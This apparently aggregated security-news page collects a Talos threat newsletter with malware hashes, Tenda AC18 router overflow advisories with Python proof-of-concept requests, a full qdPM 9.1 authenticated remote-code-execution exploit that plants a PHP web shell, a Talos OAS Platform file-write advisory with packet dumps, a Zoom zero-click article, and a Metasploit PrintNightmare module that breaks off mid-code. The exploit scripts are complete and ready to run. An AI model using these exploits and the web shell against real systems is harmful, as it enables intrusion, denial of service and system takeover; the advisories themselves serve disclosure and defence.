By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
Given the recent tragedies in the U.S., I don’t feel it’s appropriate to open by being nostalgic or trying to be witty — let’s just stick to some security news this week.    The one big...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

Given the recent tragedies in the U.S., I don’t feel it’s appropriate to open by being nostalgic or trying to be witty — let’s just stick to some security news this week.  

**The one big thing **

The BlackByte ransomware group uses its software for its own goals and as a ransomware-as-a-service offering to other criminals. This actor and its affiliates have infected victims all over the world, from North America to Colombia, the Netherlands, China, Mexico and Vietnam. BlackByte updated its leak site with a new design and new victims and is still actively exploiting victims worldwide.   

> **Why do I care? **
> 
> Talos has been monitoring BlackByte for several months and we can confirm they are still active after the FBI released a joint cybersecurity advisory in February 2022. Additionally, BlackByte is considered part of the big game ransomware groups, which are targeting large, high-profile targets, looking to exfiltrate internal data and threatening to publicly release it. Like similar groups, they have their own leaks site on the darknet. 
> 
> **So now what? **It's more important now than ever to have a multi-layered security architecture to detect these types of attacks. The adversary is likely to manage to bypass one of the other cybersecurity measures, but it is much harder for them to bypass all of them. There’s also a ton of IOCs you can add to any block lists that we have listed on our blog, as well as previous Snort rules and ClamAV signatures to protect against this threat actor.   

**Other news of note**

The ongoing battle between the Conti ransomware gang and Costa Rica continued this week, with Costa Rica’s president saying his government is “at war” with Conti. Meanwhile, Conti seems to have dissolved and is now broken up between several sub-groups, though Conti actors continue to release statements on Costa Rica. This massive ransomware attack on a country’s government has other smaller states worried they could be the next ransomware target. Many services in Costa Rica have been inoperable for weeks after the Conti attack. (Tech Monitor, The Verge, TechCrunch) 

Several state-sponsored actors in Europe and the Middle East are buying the “Predator” spyware from commercial surveillance company Cytrox to spy on Android users. Researchers from Google say they’ve spotted these actors operating in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain and Indonesia. The firm sold the spyware along with exploits for zero-day vulnerabilities in the Chrome web browser and Android operating system, which are now all patched. (Google Threat Analysis Group, Gizmodo) 

Zoom patched an XMPP vulnerability chain that could lead to remote code execution, along with several other security vulnerabilities in the virtual meeting client. A security researcher discovered an attack chain in which an attacker sends messages to the target over Zoom chat with the XMPP protocol — no user interaction is required. If successful, the attacker could then execute remote code on the targeted machine. Other vulnerabilities Zoom disclosed this week included an issue that could allow an adversary to send user session cookies to a non-Zoom domain, which could allow for spoofing. (Security Week, Google Project Zero) 

**Can’t get enough Talos? **

*   Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
*   CTA Board of Directors Spotlight: Matt Watchinski, Cisco Talos
*   People Behind CSR at Cisco: How JJ Cummings protects people in Ukraine from cyberthreats
*   Threat Roundup for May 13 - 20
*   Talos Takes Ep. #97: MustangPanda stays agnostic

  

**Upcoming events where you can find Talos ****REcon (June 3 – 5, 2022)  
Montreal, Canada ****RSA 2022 (June 6 – 9, 2022)  
San Francisco, California ****Cisco Live U.S. (June 12 – 16, 2022)  
Las Vegas, Nevada ****Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02    

**SHA 256:** 1fce2981e0d7d9c85adeea59a637d77555b466d6a6639999c6ae9b254c12dc6b    
**MD5:** f5d20b351d56605bbb51befee989fa6e  **Typical Filename:** lavasoft\_overlay\_new\_setup\_progress\_en.exe    
**Claimed Product:** PF001's Installer    
**Detection Name:** W32.8B439CC5BF-95.SBX.TG  

**SHA 256:** 818d2d5bdde999f70563c16bfa9c724897d3b01adc67089137ae97d8f7ab6ba3    
**MD5:** 9b1f8a838b5c195f9cf2f11017e38175  **Typical Filename:** document-launch-powershell.xls    
**Claimed Product:** N/A   **Detection Name:** Auto.818D2D.242455.in02 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa   **MD5:** df11b3105df8d7c70e7b501e210e3cc3   **Typical Filename:** DOC001.exe   **Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201

Threat Source newsletter (May 26, 2022) — BlackByte adds itself to the grocery list of big game hunters

Tenda AC Seris Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function fromAddressNat

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/addressNat page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function fromAddressNat.

In function fromAddressNat it reads 2 user provided parameters entrys and mitInterface into v9 and v8, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/addressNat, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/addressNat?"
url += "entrys=" + "s" \* 0x200
url += "&mitInterface=" + "a" \* 0x200

response \= requests.get(url)

**Timeline**

*   2022-05-05: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30472)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30472: VulnRepo/IoT/Tenda/1 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetClientState request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/SetClientState page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function formSetClientState.

In function formSetClientState it reads user provided parameter deviceId into v9, and this variable is passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/SetClientState, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/SetClientState?"
url += "limitEn=1&deviceId=" + "s" \* 0x500

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30477)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30477: VulnRepo/IoT/Tenda/4 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetFirewallCfg request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/SetFirewallCfg page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function formSetFirewallCfg.

In function formSetFirewallCfg it reads user provided parameter firewallEn into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer dest.

So by requesting the page /goform/SetFirewallCfg, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/SetFirewallCfg?"
url += "firewallEn=" + "s" \* 0x500

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30476)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30476: VulnRepo/IoT/Tenda/6 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a heap overflow in the httpd module when handling /goform/saveParentControlInfo request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/saveParentControlInfo page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **heap overflow** vulnerability in function saveParentControlInfo.

In function saveParentControlInfo it reads user provided parameter deviceId into src, and this variable is passed into function strcpy without any length check, which may overflow the heap-based buffer ptr.

So by requesting the page /goform/saveParentControlInfo, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/saveParentControlInfo?"
url += "deviceId=" + "s" \* 0x1000

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30474)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30474: VulnRepo/IoT/Tenda/5 at master · lcyfrank/VulnRepo

qdPM version 9.1 authenticated remote code execution exploit that leverages a path traversal.

    # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net# Date: 2021-08-03# Original Exploit Author: Rishal Dwivedi (Loginsoft)# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)# Exploit Author: Leon Trappett (thepcn3rd)# Vendor Homepage: http://qdpm.net/# Software Link: http://qdpm.net/download-qdpm-free-project-management# Version: <=1.9.1# Tested on: Ubuntu Server 20.04 (Python 3.9.2)# CVE : CVE-2020-7246# Exploit written in Python 3.9.2# Tested Environment - Ubuntu Server 20.04 LTS# Path Traversal + Remote Code Execution# Exploit modification: RedHatAugust#!/usr/bin/python3import sysimport requestsfrom lxml import htmlfrom argparse import ArgumentParsersession_requests = requests.session()def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):    request_1 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, uservar),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[remove_photo]': (None, '1'),        }    return request_1def req(userid, username, csrftoken_, EMAIL, HOSTNAME):    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)    request_3 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, ''),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),        }    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)def main(HOSTNAME, EMAIL, PASSWORD):    url = HOSTNAME + '/index.php/login'    result = session_requests.get(url)    #print(result.text)    login_tree = html.fromstring(result.text)    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))    # The designated admin account does not have a myAccount page    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')    account_tree = html.fromstring(account_page.content)    userid = account_tree.xpath("//input[@name='users[id]']/@value")    username = account_tree.xpath("//input[@name='users[name]']/@value")    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")    req(userid, username, csrftoken_, EMAIL, HOSTNAME)    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')    final_tree = html.fromstring(get_file.content)    backdoor = requests.get(HOSTNAME + "uploads/users/")    count = 0    dateStamp = "1970-01-01 00:00"    backdoorFile = ""    for line in backdoor.text.split("\n"):        count = count + 1        if "backdoor.php" in str(line):            try:                start = "\"right\""                end = " </td"                line = str(line)                dateStampNew = line[line.index(start)+8:line.index(end)]                if (dateStampNew > dateStamp):                    dateStamp = dateStampNew                    print("The DateStamp is " + dateStamp)                    backdoorFile = line[line.index("href")+6:line.index("php")+3]            except:                print("Exception occurred")                continue        #print(backdoor)    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')if __name__ == '__main__':    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')    parser.add_argument('-p', '--password', dest='password', help='User password')    args = parser.parse_args()    # Added detection if the arguments are passed and populated, if not display the arguments    if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):            main(args.hostname, args.email, args.password)    else:        parser.print_help()

qdPM 9.1 Remote Code Execution

A file write vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A file write vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more. Configuration of the platform is possible through TCP/58727 by default.

By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to upload an arbitrary file to any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.

Once the required Security Group and User Account credentials have been obtained, a file of choice can be uploaded to the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. A valid SecureTransferFiles command resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   02 b6 00 00 40 00 40 06 a2 4f c0 a8 0a 6a c0 a8   ....@.@..O...j..
    0020   0a 38 c4 ea e5 67 18 9e 24 8a 19 e0 9f df 80 18   .8...g..$.......
    0030   08 0a b5 4d 00 00 01 01 08 0a 36 5a a0 6d d6 19   ...M......6Z.m..
    0040   2e 41 00 00 00 00 00 d0 83 40 00 01 00 00 00 ff   .A.......@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 04 00 00 00 08 08 01 00   ................
    00f0   00 00 06 08 00 00 00 13 2f 68 6f 6d 65 2f 6f 61   ......../home/oa
    0100   73 75 73 65 72 2f 2e 73 73 68 2f 06 09 00 00 00   suser/.ssh/.....
    

When a successful SecureTransferFiles command is received, a response similar to the following will be returned:

    0000   00 00 00 00 00 80 44 40 00 01 00 00 00 ff ff ff   ......D@........
    0010   ff 01 00 00 00 00 00 00 00 10 01 00 00 00 02 00   ................
    0020   00 00 06 02 00 00 00 07 53 75 63 63 65 73 73 0a   ........Success.
    0030   0b                                                .
    

With file upload functionality successful, various approaches can be taken to get access to the system. The proof-of-concept here uploads a new authorized_keys file to the oasuser’s .ssh directory, after which it is possible to gain access to the system via a ssh command like the following: ssh -i id_rsa oasuser@192.168.1.10

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Vendor Response**

released as version 16.00.0113

https://openautomationsoftware.com/downloads/

**Timeline**

2022-03-15 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26082: TALOS-2022-1493 || Cisco Talos Intelligence Group

Google has disclosed a nasty set of six bugs affecting Zoom chat that can be chained together for MitM and RCE attacks, no user interaction required.

A vulnerability chain discovered in Zoom's chat functionality can be exploited to allow zero-click remote code execution (RCE), threat hunters have revealed.

Google's Project Zero uncovered an attack path that would allow cyber adversaries to silently force a victim to connect to a man-in-the-middle (MitM) server — no user action needed. From there, attackers can intercept and modify client update requests and responses in order to send the victim a malicious update, which will automatically download and execute, thus allowing RCE.

The only capability needed to carry this off successfully is the ability to send messages to the victim over Zoom chat, Project Zero researcher Ivan Fratric noted in a posting that was made public on Tuesday.   

"With the massive popularity and broad reach of Zoom, any vulnerability that could allow a remote compromise like this is of concern," Mike Parkin, senior technical engineer at Vulcan Cyber, tells Dark Reading. "While an attack appears to require the threat actor to be on an active Zoom call with the target, the wide prevalence of the platform and the number of large group meetings means it shouldn’t be difficult for a malicious actor to find suitable victims."  

**XMPP "Stanza Smuggling" Bug  
**Zoom chat uses a messaging protocol based on XML called XMPP. Fratric explained that messages are exchanged using short snippets of XML called "stanzas" that are sent over a single stream back and forth from client to server. The initial issue is the fact that the client and server don't see eye-to-eye when interpreting whether message code is well formed, leading to parsing inconsistencies.

"The clients use gloox library for XML parsing … and Zoom's server … uses fast\_xml for XML parsing, which in turn uses an XML parser called Expat," the researcher noted. "Indeed, it turns out that Expat and gloox parse XML in a different way and (at least one) exploitable inconsistency exists."

At issue is the fact that the server's Expat parser is lax when it comes to validating tag and attribute names, Fratric said. Specifically, it will forward tag names containing question marks (i.e., "<?xml ?>") to the client, even though it shouldn't. And when the client's gloox parser sees the question-mark sequence, it will reset the parser state so that anything coming after that will be considered a legitimate root node of the next stanza.

This makes it possible to escape the <message> tag safeguards, he noted, to add in whatever content the attacker would like: "The <message> tag here can, of course, be replaced with <iq> or any other tag and it will be accepted by the client as the data coming from the server." He dubbed this "stanza-smuggling."

Since attackers now have complete control over the message tag, that also means they can manipulate the "from" attribute, in order to spoof messages as if coming from another user. And, Fratric noted, they can also lead the victim's contacts to malicious websites for phishing or drive-by malware attacks. This is accomplished by altering the file-integration tag, to surreptitiously replace the URL that's opened when the user wants to share a file with another user, using Dropbox, Google Drive, SharePoint, and other cloud-based services.  

**Achieving Man-in-the-Middle Status  
**The MitM attack is accomplished by changing the <strem:error> tag. Using a specially crafted stanza, bad actors can create "a 'ClusterSwitch' task in the Zoom client, with an attacker-controlled 'web domain' as a parameter," Fratric said.

To trigger the attack, adversaries can simply type and send a message to the victim containing the magic string "iddqd" in the tag. That will cause the victim client to connect to the /clusterswitch endpoint on the attacker-provided domain, thus setting up the ability to see and modify traffic between the client and the Zoom Web server.

"From /clusterswitch endpoint, a client gets a list of domains to be used for various services," Fratric explained. "Since the attacker is already in the man-in-the-middle position, they can replace any of the domains with their own, acting as a reverse proxy and intercepting communications."

**Exploiting the Client Update Process  
**The escalation to arbitrary code execution was a logical next step, Fratric noted, given that Zoom clients will periodically query the update endpoint from Zoom's Web server to see if there's anything new to install.

"Since the attacker is already in the MitM position, they can, of course, replace these endpoints and serve arbitrary data," according to the researcher.

Fratric ran into a snag here, though: The client downloads two files as part of the update process, and verifies their legitimacy — the "Installer.exe" file must be signed by "Zoom Video Communications, Inc." to start with; once installed, it checks the hash of the second .cab file.

However, it turns out that attackers can get around these hurdles with a downgrade attack.

"I served Installer.exe and .cab from Zoom version 4.4 (from mid-2019)," the researcher explained. "The installer for this version is still properly signed; however, it does not do any security checks on the .cab file."

**Patch Now**

In all, Fratric reported a total of six security vulnerabilities, including four Zoom-specific issues fixed in version 5.10.4 of the Zoom client:  

*   CVE-2022-22784 (improper XML parsing)
*   CVE-2022-22786 (update package downgrade),
*   CVE-2022-22787 (insufficient hostname validation​​),
*   CVE-2022-22785 (improperly constrained session cookies)

There's unfortunately also a software supply chain issue at work: The two others (CVE-2022-25235, CVE-2022-25236) affect the Expat parser, which is open source and used in plenty of other applications, including wares from Aruba, F5, IBM, and Oracle, as well as the Red Hat Linux distro. They're patched in Expat version 2.4.5.

"Some or all parts of the chain are likely applicable to other platforms," Fratric said.

Zoom became a popular target for "Zoom-bombing" and other attacks in the wake of the work-from-home wave during the pandemic, calling into question the security of the platform and its encryption practices. The company implemented a raft of security changes to match it's heightened status, but nonetheless, bugs like these are somewhat inevitable, researchers noted.

"In 2020, we all instantly became hyper-connected to the Internet…and so did all of the systems we use," Mark Lambert, vice president of products at ArmorCode, tells Dark Reading. "Two years later, and it is clear that there is no looking back. Unfortunately, these types of vulnerabilities are inevitable given the speed that software is released to meet business goals. The only way for us to protect ourselves is to detect as soon as possible and react even quicker."

Managing the volume of software vulnerabilities and alerts is a difficult challenge for developers, he notes. "The only way for them to keep up with the pace of delivery is to operationalize application security and embed it into their DevOps pipeline."

Zero-Click Zoom Bug Allows Code Execution Just by Sending a Message

The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'windows_error'require 'ruby_smb'require 'ruby_smb/error'class MetasploitModule < Msf::Exploit::Remote  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::DCERPC  include Msf::Exploit::Remote::SMB::Client::Authenticated  include Msf::Exploit::Remote::SMB::Server::Share  include Msf::Exploit::Retry  include Msf::Exploit::EXE  include Msf::Exploit::Deprecated  moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'  PrintSystem = RubySMB::Dcerpc::PrintSystem  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Print Spooler Remote DLL Injection',        'Description' => %q{          The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted          DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN          vector which requires the Print Spooler service to be running.        },        'Author' => [          'Zhiniang Peng',           # vulnerability discovery / research          'Xuefeng Li',              # vulnerability discovery / research          'Zhipeng Huo',             # vulnerability discovery          'Piotr Madej',             # vulnerability discovery          'Zhang Yunhai',            # vulnerability discovery          'cube0x0',                 # PoC          'Spencer McIntyre',        # metasploit module          'Christophe De La Fuente', # metasploit module co-author        ],        'License' => MSF_LICENSE,        'DefaultOptions' => {          'SRVHOST' => Rex::Socket.source_address        },        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          [            'Windows', {              'Platform' => 'win',              'Arch' => [ ARCH_X64, ARCH_X86 ]            },          ],        ],        'DisclosureDate' => '2021-06-08',        'References' => [          ['CVE', '2021-1675'],          ['CVE', '2021-34527'],          ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],          ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],          ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],          ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']        ],        'Notes' => {          'AKA' => [ 'PrintNightmare' ],          'Stability' => [CRASH_SERVICE_DOWN],          'Reliability' => [UNRELIABLE_SESSION],          'SideEffects' => [            ARTIFACTS_ON_DISK # the dll will be copied to the remote server          ]        }      )    )    register_advanced_options(      [        OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])      ]    )    deregister_options('AutoCheck')  end  def check    begin      connect(backend: :ruby_smb)    rescue Rex::ConnectionError      return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')    end    begin      smb_login    rescue Rex::Proto::SMB::Exceptions::LoginError      return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')    end    begin      dcerpc_bind_spoolss    rescue RubySMB::Error::UnexpectedStatusCode => e      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first      if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND        print_error("The 'Print Spooler' service is disabled.")      end      return Exploit::CheckCode::Safe("The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).")    end    @target_arch = dcerpc_getarch    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43    if @target_arch == ARCH_X64      @environment = 'Windows x64'    elsif @target_arch == ARCH_X86      @environment = 'Windows NT x86'    else      return Exploit::CheckCode::Detected('Successfully bound to the remote service.')    end    print_status("Target environment: Windows v#{simple.client.os_version} (#{@target_arch})")    print_status('Enumerating the installed printer drivers...')    drivers = enum_printer_drivers(@environment)    @driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL"    vprint_status("Using driver path: #{@driver_path}")    print_status('Retrieving the path of the printer driver directory...')    @config_directory = get_printer_driver_directory(@environment)    vprint_status("Using driver directory: #{@config_directory}") unless @config_directory.nil?    container = driver_container(      p_config_file: 'C:\\Windows\\System32\\kernel32.dll',      p_data_file: "\\??\\UNC\\127.0.0.1\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll"    )    case add_printer_driver_ex(container)    when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code      return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')    when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND      return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')    when ::WindowsError::Win32::ERROR_BAD_NET_NAME      return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')    when ::WindowsError::Win32::ERROR_ACCESS_DENIED      return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')    end    Exploit::CheckCode::Detected('Successfully bound to the remote service.')  end  def run    fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64    fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?    fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?    super  end  def setup    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')    end    super  end  def start_service    file_name << '.dll'    self.file_contents = generate_payload_dll    super  end  def primer    dll_path = unc    if dll_path =~ /^\\\\([\w:.\[\]]+)\\(.*)$/      # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass      # otherwise the operation will fail with ERROR_INVALID_PARAMETER      dll_path = "\\??\\UNC\\#{Regexp.last_match(1)}\\#{Regexp.last_match(2)}"    end    vprint_status("Using DLL path: #{dll_path}")    filename = dll_path.rpartition('\\').last    container = driver_container(p_config_file: 'C:\\Windows\\System32\\kernel32.dll', p_data_file: dll_path)    3.times do      add_printer_driver_ex(container)    end    1.upto(3) do |directory|      container.driver_info.p_config_file.assign("#{@config_directory}\\3\\old\\#{directory}\\#{filename}")      break if add_printer_driver_ex(container).nil?    end    cleanup_service  end  def driver_container(**kwargs)    PrintSystem::DriverContainer.new(      level: 2,      tag: 2,      driver_info: PrintSystem::DriverInfo2.new(        c_version: 3,        p_name_ref_id: 0x00020000,        p_environment_ref_id: 0x00020004,        p_driver_path_ref_id: 0x00020008,        p_data_file_ref_id: 0x0002000c,        p_config_file_ref_id: 0x00020010,        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913        p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",        p_environment: @environment,        p_driver_path: @driver_path,        **kwargs      )    )  end  def dcerpc_bind_spoolss    handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])    vprint_status("Binding to #{handle} ...")    dcerpc_bind(handle)    vprint_status("Bound to #{handle} ...")  end  def enum_printer_drivers(environment)    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 